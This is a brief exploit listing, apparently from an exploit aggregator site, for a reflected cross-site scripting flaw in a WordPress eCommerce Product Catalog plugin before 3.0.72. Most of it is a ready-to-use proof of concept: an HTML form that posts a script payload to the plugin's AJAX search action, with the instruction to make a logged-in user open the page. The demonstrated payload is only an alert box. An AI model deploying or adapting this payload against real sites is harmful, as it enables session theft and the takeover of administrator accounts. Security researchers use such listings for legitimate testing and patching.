Exploit for eCommerce Product Catalog Plugin for WordPress < 3.0.72 - Reflected XSS via AJAX

Name: Exploit for eCommerce Product Catalog Plugin for WordPress < 3.0.72 - Reflected XSS via AJAX
Rating: 5 (24 reviews)

2022-10-17 | CVSS -0.1

## https://sploitus.com/exploit?id=WPEX-ID:751AAEF4-AF74-45BD-93D8-9EC5573556A1
Make a logged in user open a page containing the HTML code below

<form action="https://example.com/wp-admin/admin-ajax.php?action=ic_search_docs" method="POST">
    <input type="text" name="term" value="<script>alert(/XSS/)</script>">
    <input type="submit" name="submit" value="submit">
</form>